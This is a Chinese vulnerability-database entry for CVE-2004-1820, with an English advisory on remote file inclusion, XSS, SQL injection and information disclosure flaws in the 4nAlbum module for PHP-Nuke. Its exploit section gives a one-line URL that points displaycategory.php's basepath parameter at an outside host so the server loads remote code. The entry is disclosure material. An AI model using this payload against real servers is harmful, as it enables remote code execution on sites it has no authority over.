WarpSpeed 4nAlbum Module For PHPNuke Multiple漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107793 漏洞类型 输入验证
发布时间 2004-03-15 更新时间 2006-09-28
CVE编号 CVE-2004-1820 CNNVD-ID CNNVD-200403-070
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23815
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200403-070
|漏洞详情
PHP-Nuke6.5到7.0版本中4nalbum0.92的displaycategory.php存在PHPremotefileinclusion漏洞。远程攻击者通过修改引用包含fileFunctions.php远程的web服务器URL的basepath参数执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/9881/info

It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input.

There is an information disclosure issue with the 'displaycategory.php' script. 

There is a remote file inclusion vulnerability in the 'displaycategory.php' script. 

A cross-site scripting vulnerability in the 'nmimage.php' script has also been reported.

Finally an SQL injection vulnerability has been reported. This issue may be leveraged through the 'modules.php' script of phpNuke while requesting the 'index' file of the 4nAlbum module.

This issue has been reported to affect version 0.92 of the software. It is quite likely that other versions are affected as well.

http://www.example.com/phpNukeDirectory/modules/4nalbum/public/displaycategory.php?basepath=http://www.example.net/
|参考资料

来源:SECUNIA
名称:11134
链接:http://secunia.com/advisories/11134
来源:XF
名称:4nalbum-displaycategory-file-include(15496)
链接:http://xforce.iss.net/xforce/xfdb/15496
来源:BID
名称:9881
链接:http://www.securityfocus.com/bid/9881
来源:OSVDB
名称:4292
链接:http://www.osvdb.org/4292
来源:BUGTRAQ
名称:20040315[waraxe-2004-SA#006-Multiplevulnerabilitiesin4nalbummoduleforPhpNuke]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107937780222514&w=2